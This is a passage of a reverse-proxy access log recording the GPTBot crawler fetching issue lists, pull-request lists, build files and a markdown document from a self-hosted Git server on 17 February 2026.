+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10014] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:19:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/base_library.zip" +[17/Feb/2026:19:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=rendered" [Client 74.7.227.38] [Length 11185] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:19:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:29:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10165] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10034] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:29:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:29:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10065] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10234] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10078] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10255] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:30:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:30:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9955] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:19:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" [Client 74.7.227.38] [Length 15873] [Gzip 6.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:19:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:19:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118424] [Gzip 6.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 118288] [Gzip 6.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" 